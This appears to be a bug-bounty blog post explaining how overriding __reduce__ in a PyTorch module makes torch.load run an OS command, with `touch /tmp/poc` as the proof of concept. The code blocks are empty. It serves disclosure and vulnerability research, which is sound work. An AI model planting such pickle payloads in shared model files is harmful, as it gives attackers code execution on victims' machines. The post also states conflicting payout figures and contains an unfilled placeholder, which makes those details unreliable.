Don’t Trust Your Model: How a Malicious Pickle Payload in PyTorch Can Execute Code

In this blog, we're breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like PyTorch can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs on huntr.

The Vulnerability Explained

The Role of Pickle in PyTorch

  • Serialization with pickle:
    PyTorch uses Python’s pickle module for its torch.save() and torch.load() functions. This allows models to be saved and reloaded with ease.

  • The Risk Factor:
    The pickle protocol involves calling an object's __reduce__ method to determine how to rebuild it. If an attacker can override this method, they can control what happens during deserialization—leading to arbitrary code execution.

A Step-by-Step Walkthrough

  1. Crafting the Malicious Model:

    A custom PyTorch module is defined to override __reduce__. In our proof-of-concept (PoC), the overridden method instructs the deserialization process to run an OS command—touch /tmp/poc—as soon as the model is loaded.

     
  2. Executing the Payload:

    When an unsuspecting user tries to load the model using the standard <pytorch, tensorflow, whatever> method the payload triggers and executes arbitrary python code:

     

This PoC will use the arbitrary code execution to perform a simple arbitrary file creation to create /tmp/poc on the victim's machine.

Why Should You Care?

This vulnerability isn’t just a textbook case—it’s a gold mine for anyone looking to cash in on easy, high-impact exploits. Here’s why you should be all over it:

  • Endless Discovery Potential: Use this PoC as a launchpad to explore similar vulnerabilities across various model formats.
  • Lucrative Rewards: With huntr offering up to $3,000 per validated MFV, your next discovery could be both a reputation boost and a major payday.

Get Involved

This example MFV shows that even the most trusted machine learning frameworks can be exploited. By understanding the mechanics of PyTorch’s pickle deserialization, you can turn this knowledge into actionable insights—finding and reporting vulnerabilities before they can be exploited in the wild.

At huntr, we offer bounty payouts up to $4,000 per validated MFV. If you have discovered a vulnerability in how models are serialized or can demonstrate a novel exploit, submit your detailed proof-of-concept (PoC) via our submission portal. Happy hunting!